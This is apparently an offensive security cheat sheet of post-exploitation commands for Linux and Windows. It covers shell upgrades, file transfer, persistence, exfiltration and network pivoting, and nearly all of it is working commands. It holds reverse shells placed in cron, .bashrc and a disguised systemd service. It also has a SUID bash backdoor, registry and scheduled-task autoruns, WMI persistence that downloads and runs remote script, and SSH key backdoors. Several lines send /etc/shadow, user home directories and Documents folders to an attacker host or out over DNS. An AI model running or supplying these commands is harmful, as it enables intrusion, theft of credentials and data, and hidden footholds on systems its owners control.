Post-exploitation commands for shell stabilization, persistence, file transfer, data exfiltration, network pivoting, and covering tracks on Linux and Windows. (36 payloads)
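# Python PTY method (most common):
python3 -c "import pty; pty.spawn('/bin/bash')"
# Or python2:
python -c "import pty; pty.spawn('/bin/bash')"
# Then in same shell (xterm is the safe default; use your own $TERM value if you want colours/keys to match):
export TERM=xterm
# Background with Ctrl+Z, then in host terminal:
stty raw -echo; fg
# "raw -echo" is applied to YOUR terminal, not the victim's. If the remote shell dies
# before you undo it, your keystrokes stop echoing — blind-type `reset` (then Enter) to recover.
# Now have full PTY: tab completion, Ctrl+C, clear, etc.
# script command method: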
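script /dev/null -c bash    # /dev/null: no typescript file is left on disk (util-linux); BSD/macOS: script -q /dev/null /bin/bash
# Background with Ctrl+Z, then (on the attacker terminal):
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
# Rows/columns must match the ATTACKER terminal or full-screen tools (vim, less, htop)
# wrap and scroll wrongly. Get the real values with `stty size` on the attacker
# (prints "<rows> <cols>") and substitute them here instead of guessing:
stty rows 38 columns 116
# socat method (best quality — requires socat on target):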
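# On attacker — the listener attaches whoever connects to YOUR tty, so restrict it to
# the victim's address (range=) instead of accepting from anywhere on 0.0.0.0:
socat file:"$(tty)",raw,echo=0 "tcp-listen:4444,reuseaddr,range=<VICTIM_IP>/32"
# On victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane "tcp:<ATTACKER_IP>:4444"
# Everything above is cleartext TCP. socat also does openssl-listen / openssl-connect
# if the shell traffic must not be readable on the wire.
# rlwrap method (quick TTY upgrade for listeners):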
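rlwrap nc -lvnp 4444
# Provides readline editing (history, arrow keys) even in raw netcat shells.
# It does NOT give the remote side a pty: Ctrl+C still kills the listener and
# interactive programs still misbehave — use one of the PTY methods above for that.
# Fix terminal size after PTY upgrade:
# The numbers must come from the ATTACKER terminal. Running `$(tput lines)` inside the
# upgraded shell reads the remote pty's own size, not yours, so that form is a no-op.
#   1. attacker:  stty size                    # prints "<rows> <cols>"
#   2. victim:    stty rows <rows> columns <cols>
stty rows 38 columns 116    # example values from step 1
# HTTP methods: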
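# HTTP methods (plain HTTP: the file name and contents are visible — and replaceable — on the path):
wget "http://<IP>:<PORT>/file" -O /tmp/file
# -f: a 404/500 error page is not silently written into /tmp/file and passed off as the tool
curl -fsS "http://<IP>:<PORT>/file" -o /tmp/file
# Start HTTP server on attacker. http.server publishes the WHOLE directory it runs in,
# with a browsable index — serve from a directory that holds only what you mean to hand out:
mkdir -p /tmp/srv
python3 -m http.server 80 --directory /tmp/srv                  # ports <1024 need root; 8000 otherwise (--directory: 3.7+)
python3 -m http.server 80 --directory /tmp/srv --bind "<ATTACKER_IP>"   # one interface instead of 0.0.0.0
php -S 0.0.0.0:80 -t /tmp/srv
# Netcat file transfer: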
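# Receive on victim — note the direction: the VICTIM must accept an inbound connection.
# If only outbound is allowed, swap the roles (listen on the attacker, `nc <ATTACKER_IP> 4444 < file` on the victim).
nc -lvnp 4444 > received_file
# Send from attacker:
nc "<VICTIM_IP>" 4444 < file_to_send
# Some nc builds keep the connection open after EOF, so the receiver never exits:
# add -q 1 (Debian nc.traditional), -N (OpenBSD nc) or --send-only (ncat) on the sending side.
# nc has no integrity check — compare hashes before running what arrived:
sha256sum file_to_send     # attacker
sha256sum received_file    # victim; must match
# Base64 transfer (no special tools needed):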
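# On attacker:
base64 -w 0 file.exe > file.b64    # -w is GNU coreutils; macOS/BSD: base64 -b 0, or pipe through tr -d '\n'
sha256sum file.exe                 # keep this to verify the decoded copy
cat file.b64 # copy the output
# On victim — paste into a heredoc, not into an `echo "..."` argument: a single argument is
# capped by the kernel (MAX_ARG_STRLEN, 128 KiB on Linux) and a multi-megabyte quoted
# string is easily mangled by the terminal on paste.
base64 -d > /tmp/file.exe << 'EOF'
<base64_data>
EOF
sha256sum /tmp/file.exe            # must match the attacker-side hash
# SCP (if SSH key available):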
# Push a file onto the victim:
scp -- file.txt "<user>@<VICTIM_IP>:/tmp/"
# Pull a file back to the attacker's /tmp/:
scp -- "<user>@<VICTIM_IP>:/etc/shadow" /tmp/
# Python3 upload server on attacker (receive files FROM victim):
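# SimpleHTTPRequestHandler only implements GET/HEAD — a POST or PUT to it answers
# "501 Unsupported method", so the plain one-liner cannot RECEIVE anything.
# Minimal stdlib receiver: the raw body of a POST/PUT is written to ./upload.bin
# (each request overwrites it; listens on 0.0.0.0:8080, so anyone who reaches it can write that file):
python3 -c '
import http.server, socketserver
class H(http.server.SimpleHTTPRequestHandler):
    def do_PUT(self):
        n = int(self.headers.get("Content-Length", 0))
        with open("upload.bin", "wb") as f:
            f.write(self.rfile.read(n))
        self.send_response(200); self.end_headers()
    do_POST = do_PUT
socketserver.TCPServer(("", 8080), H).serve_forever()'
# Victim uploads to it (raw body; --data-binary keeps newlines and binary intact):
curl --data-binary @/etc/shadow "http://<IP>:8080/"
curl -T /etc/shadow "http://<IP>:8080/"        # same via PUT
# Or use uploadserver (third-party: pip install uploadserver). It takes a multipart form
# on port 8000, endpoint /upload, field name "files" — the port in the curl line must match:
python3 -m uploadserver
curl -F "files=@/etc/shadow" "http://<IP>:8000/upload"
# PowerShell download: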
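# Plain HTTP: the payload can be read and swapped by anyone on the path. C:\Temp must already exist.
(New-Object Net.WebClient).DownloadFile("http://<IP>/file.exe","C:\Temp\file.exe")
# -UseBasicParsing: without it Windows PowerShell 5.1 drives the IE DOM engine and fails
# on hosts where IE first-run setup was never completed (typical on servers).
Invoke-WebRequest -Uri "http://<IP>/file.exe" -OutFile "C:\Temp\file.exe" -UseBasicParsing
# One-liner with execution — nothing touches disk, but the downloaded script text is
# recorded verbatim when Script Block Logging (event 4104) or AMSI is enabled:
IEX (New-Object Net.WebClient).DownloadString("http://<IP>/script.ps1")
# certutil (LOLBIN — built in on every Windows version):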
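certutil -urlcache -split -f "http://<IP>/file.exe" file.exe
# -urlcache leaves a second copy of the download in the user's INetCache; purge it when done:
certutil -urlcache "http://<IP>/file.exe" delete
# This exact command line is a staple of AV/EDR signatures — expect it to be flagged or blocked.
# Encode/decode files (the encoded output is wrapped in -----BEGIN/END CERTIFICATE----- lines):
certutil -encode file.exe file.b64
certutil -decode file.b64 file.exe
# bitsadmin (LOLBIN):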
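bitsadmin /transfer job /download /priority normal "http://<IP>/file.exe" "C:\Temp\file.exe"
# bitsadmin is deprecated but still present; the PowerShell equivalent is
#   Start-BitsTransfer -Source "http://<IP>/file.exe" -Destination "C:\Temp\file.exe"
# Every BITS job (name, URL, owner) is written to Microsoft-Windows-Bits-Client/Operational.
# SMB server + copy (impacket on attacker):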
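# impacket-smbserver is a script on PATH (Kali package), not a Python module:
# `python3 impacket-smbserver` only looks for a file of that name in the cwd and fails.
# -username/-password: current Windows 10/11 and Server 2019+ refuse unauthenticated
# (guest) SMB shares by default, so an open share is simply "access denied".
impacket-smbserver share /tmp -smb2support -username x -password x
# (or: python3 /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp -smb2support -username x -password x)
# Windows victim:
net use \\<ATTACKER_IP>\share /user:x x
copy \\<ATTACKER_IP>\share\file.exe C:\Temp\file.exe
net use \\<ATTACKER_IP>\share /delete
# Note the share exposes all of /tmp on the attacker box; point it at a dedicated directory.
# Netcat on Windows: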
nc.exe -l -v -n -p 4444 > file.txt
# nc.exe has to be dropped on the box first; bitsadmin/certutil above need nothing extra
# Cron reverse shell:
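# cron runs jobs under /bin/sh (SHELL defaults to sh, not bash); `>&` and /dev/tcp are
# bash-only, so the payload must be wrapped in `bash -c` or it fails silently every minute.
# Single quotes inside: nothing is expanded when the entry is written.
(crontab -l 2>/dev/null; echo "* * * * * bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'") | crontab -
# Root cron (if writable):
# /etc/cron.d entries carry a user field. cron ignores files that are not owned by root or
# are group/world-writable, and Debian-family cron also ignores names containing a dot.
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'" >> /etc/cron.d/backdoor
chmod 644 /etc/cron.d/backdoor
# Both fire every minute and open a NEW connection each time, whether or not one is up.
# Run a listener that keeps accepting (socat ...,fork or `while true; do nc -lvnp 4444; done`)
# so you are not racing the next connect.
# SSH authorized_keys backdoor: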
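mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "<ATTACKER_PUBLIC_KEY>" >> ~/.ssh/authorized_keys    # >> keeps the user's own keys working
chmod 600 ~/.ssh/authorized_keys
# sshd (StrictModes yes, the default) also rejects the key when $HOME itself is group/world-
# writable — check `ls -ld ~`. If it still fails, sshd may use another AuthorizedKeysFile or
# restrict logins: grep -iE 'AuthorizedKeysFile|AllowUsers|AllowGroups|PubkeyAuthentication' /etc/ssh/sshd_config
# Now SSH in: ssh -i id_rsa <user>@<IP>
# Prefer an ed25519 key (ssh-keygen -t ed25519): one short line to paste, accepted by any modern sshd.
# .bashrc / .bash_profile persistence: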
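# ( ... & ): started inside a subshell, so the user's interactive shell prints no "[1] <pid>" job notice.
# 2>/dev/null BEFORE >&: if the listener is down the "bash: connect: Connection refused"
# from the failed redirection goes to /dev/null instead of the user's terminal.
# Single quotes: nothing is expanded when the line is written.
echo '( bash -i 2>/dev/null >& /dev/tcp/<IP>/4444 0>&1 & )' >> ~/.bashrc
# Triggers on every new interactive bash session by this user. Login shells read
# .bash_profile/.profile instead; it only fires there if that file sources .bashrc (most distros do).
# systemd service persistence (root required):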
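cat > /etc/systemd/system/backdoor.service << 'EOF'
[Unit]
Description=System Monitoring Service
# Default start rate limit (5 starts in 10 s) would leave the unit permanently "failed"
# while the listener is down; disable the limit and back off instead of hammering.
StartLimitIntervalSec=0
[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/<IP>/4444 0>&1"
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now backdoor    # enable + start in one step
# Every (re)start and every failed connect lands in the journal (journalctl -u backdoor);
# the unit name and Description are what a defender reads there — "backdoor" is a demo name.
# SUID bash backdoor (root required):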
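# Only works if the directory is not mounted nosuid — check `findmnt -no OPTIONS /tmp`;
# hardened hosts mount /tmp, /dev/shm and /home that way, so pick another writable path.
cp /bin/bash /tmp/.hidden_bash
chmod u+s /tmp/.hidden_bash    # u+s is all that is needed; bare +s also sets setgid
# Later: /tmp/.hidden_bash -p   (-p keeps euid 0; without it bash drops back to the real uid)
# setuid binaries are trivially enumerated: find / -perm -4000 -type f 2>/dev/null
# Registry autorun: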
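reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Temp\payload.exe" /f
# Runs as current user on login (RunOnce next to it fires a single time and deletes itself)
# HKLM (requires admin):
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Temp\payload.exe" /f
# Run keys are the first thing Autoruns and Sysmon (Event ID 13, registry value set) show;
# the value name and the path should look like they belong. Remove with:
#   reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /f
# Scheduled task persistence: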
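# /ru SYSTEM needs an elevated prompt; as a plain user drop /ru (runs as you) or use /rl HIGHEST
schtasks /create /sc onlogon /tn "WindowsUpdate" /tr "C:\Temp\payload.exe" /ru SYSTEM /f
schtasks /run /tn "WindowsUpdate"
# Creation is logged (Security 4698 with object auditing on; Task Scheduler operational log)
# and the task XML sits in C:\Windows\System32\Tasks\<name>. Remove with:
#   schtasks /delete /tn "WindowsUpdate" /f
# Startup folder: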
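# %APPDATA% already expands to C:\Users\<user>\AppData\Roaming — no username to fill in
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
# Or All Users (admin required):
copy payload.exe "%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp\"
# Runs with the logging-in user's rights at each interactive logon. No registry or task
# artifact, but the file sits in plain view (Autoruns "Logon" tab, explorer shell:startup).
# WMI event subscription (stealthy, admin required):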
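# Fires once per boot, when SystemUpTime is between 120 s and 180 s (checked every 60 s):
# it survives reboots but does NOT run on the box right now — reboot, or use another WQL trigger, to test.
$Command = 'powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\"http://<IP>/shell.ps1\")"'
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments @{Name="SystemEventFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"}
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments @{Name="SystemConsumer";CommandLineTemplate=$Command}
$Binding = Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{Filter=$Filter;Consumer=$Consumer}
# Cleanup — remove the binding first, then consumer and filter (these three queries are
# also exactly what defenders run to hunt WMI persistence):
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SystemEventFilter%'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='SystemConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='SystemEventFilter'" | Remove-WmiObject
# Sysmon Event IDs 19/20/21 and Microsoft-Windows-WMI-Activity/Operational record all three creations.
# DLL hijacking persistence in application startup path: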
# Find an application that runs at startup and a DLL it loads by bare name from its own
# directory (or one that is missing altogether); Process Monitor filtered on "NAME NOT FOUND"
# for *.dll shows the candidates. The application directory must be writable by you.
# Drop a malicious DLL in the application directory — it has to export what the app expects
# (or forward to the real DLL) or the application breaks and the persistence is noticed.
# Netcat exfiltration:
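# Receive on attacker:
nc -lvnp 4444 > exfil.tar.gz
# Send on victim. --ignore-failed-read (GNU tar): unreadable files in other users' homes are
# skipped instead of aborting the archive; tar's "Removing leading /" notice goes to stderr only.
tar czf - --ignore-failed-read /home/ | nc "<ATTACKER_IP>" 4444
# All of /home is loud (volume, duration, one long-lived connection) — tar only what the
# objective needs. Confirm the archive arrived intact before closing the shell:
tar tzf exfil.tar.gz > /dev/null && echo OK    # attacker
# HTTP POST exfiltration: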
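# -F: multipart form upload. uploadserver listens on 8000, endpoint /upload, and only
# stores the field named "files" — "data=" is accepted and then dropped:
curl -F "files=@/etc/shadow" "http://<ATTACKER_IP>:8000/upload"
# -d @file STRIPS carriage returns and newlines from the file (it is meant for form-encoded
# data), so /etc/passwd would arrive as one line. --data-binary sends the bytes unchanged;
# a raw body like this needs a receiver that reads the request body, not uploadserver:
curl --data-binary @/etc/passwd "http://<ATTACKER_IP>:8080/"
# Receive multipart uploads with (third-party: pip install uploadserver):
python3 -m uploadserver
# DNS exfiltration (slow, bypasses many firewalls):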
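# Exfil via DNS lookups: each query travels through the victim's resolver (and its logs) to
# the authoritative NS for <ATTACKER_DOMAIN>, which you control.
# Two things the naive "base32 each line" loop gets wrong: a DNS label is at most 63 octets
# and a whole name 253, so any line longer than ~39 bytes is rejected by the resolver before
# it is ever sent; and resolvers cache, so a chunk that repeats reaches you once. Hence
# fixed-width chunks of the whole file, each prefixed with a sequence number.
i=0
base32 -w0 /etc/passwd | tr -d '=' | tr '[:upper:]' '[:lower:]' | fold -w 60 |
  while IFS= read -r chunk; do
    nslookup "${i}.${chunk}.<ATTACKER_DOMAIN>" >/dev/null 2>&1    # or: dig +short "${i}.${chunk}.<ATTACKER_DOMAIN>"
    i=$((i + 1))
  done
# Receive with dnscat2, or just capture queries on the NS (tcpdump -ni eth0 udp port 53):
# sort by sequence number, join the chunks, upper-case them (resolvers may randomise case
# in transit, and base32 -d wants A-Z2-7), re-add '=' padding, base32 -d.
# Base64 in-band exfiltration (copy-paste):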
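base64 -w0 /etc/shadow; echo    # single line: easier to select/copy than 76-column wrapped output
sha256sum /etc/shadow           # note it for the check below
# Copy base64 output, decode on attacker. A heredoc avoids both the argument-length limit
# and any quoting trouble that `echo "<...>" | base64 -d` has with large pastes:
base64 -d > shadow << 'EOF'
<copied_base64>
EOF
sha256sum shadow                # must match the victim-side hash
# Windows: Compress and exfil via PowerShell: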
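Compress-Archive -Path C:\Users\*\Documents -DestinationPath C:\Temp\docs.zip -Force    # -Force: overwrite an existing docs.zip instead of erroring
# One statement on one line: a parameter left on the following line without a trailing
# backtick is parsed as a separate command, and the POST goes out without it.
# -InFile sends the raw bytes as the body (not a multipart form) — the receiver must read the request body.
Invoke-RestMethod -Uri "http://<ATTACKER_IP>/upload" -Method POST -InFile C:\Temp\docs.zip -ContentType "application/octet-stream"
# Plain HTTP: the archive is readable on the wire. Delete C:\Temp\docs.zip afterwards.
# SSH local port forward (access internal service from attacker):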
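# -N: tunnel only, no remote shell is started on the pivot; -f: background once authenticated
ssh -N -f -L "<local_port>:<internal_host>:<internal_port>" "<user>@<pivot_host>"
# Example — access internal web server:
ssh -N -f -L 8080:192.168.1.10:80 user@pivot.host
# Browse http://localhost:8080 on attacker. The local end binds 127.0.0.1 only;
# -L 0.0.0.0:8080:... would hand the tunnel to everyone on your LAN — only if intended.
# SSH remote port forward (expose attacker service on internal net):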
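ssh -N -R "<remote_port>:localhost:<local_port>" "<user>@<pivot_host>"
# Example — expose attacker Metasploit on pivot:
ssh -N -R 4444:localhost:4444 user@pivot.host
# The listener on the pivot binds 127.0.0.1 unless sshd_config has "GatewayPorts yes"
# (or "clientspecified", then: -R 0.0.0.0:4444:localhost:4444). With the default config only
# processes ON the pivot can reach it — not the rest of the internal net.
# Once exposed, anyone who can reach <PIVOT_IP>:4444 reaches your handler; keep that in mind
# when choosing what to put behind it.
# SSH SOCKS proxy (route all tools through pivot):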
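ssh -N -D 1080 user@pivot.host
# Configure proxychains to use 127.0.0.1:1080 ("socks5 127.0.0.1 1080" in /etc/proxychains4.conf)
# Only full TCP connects go through SOCKS: -sT is mandatory, and -Pn skips host discovery
# (ICMP/ARP cannot traverse the proxy, so without -Pn every host is reported down).
# -n stops reverse DNS lookups leaking out through your own resolver. No SYN/UDP scans, no -O.
proxychains nmap -sT -Pn -n 192.168.1.0/24
# It is slow — start with a few ports per host (-p 22,80,443,445) and widen from there.
# chisel server (on attacker):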
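# --reverse allows clients to open R: listeners on this server; --auth stops anyone else who
# finds port 8080 from doing the same through your box.
./chisel server --port 8080 --reverse --auth user:pass
# chisel client (on victim):
./chisel client --auth user:pass "<ATTACKER_IP>:8080" R:socks
# Creates SOCKS5 proxy on attacker port 1080 (R:<port>:socks to pick another); point
# proxychains at 127.0.0.1:1080. The chisel binary has to be transferred to the victim first.
# socat TCP relay (pivot without SSH):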
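# On pivot — relay port 4444 to attacker. range= limits who may use the relay; without it
# anyone who can reach the pivot can talk to your listener through it.
socat "tcp-listen:4444,fork,reuseaddr,range=<VICTIM_IP>/32" "tcp:<ATTACKER_IP>:4444"
# Victim connects to pivot:
bash -i >& "/dev/tcp/<PIVOT_IP>/4444" 0>&1
# Cleartext end to end: the pivot (and anything watching it) sees every byte it relays.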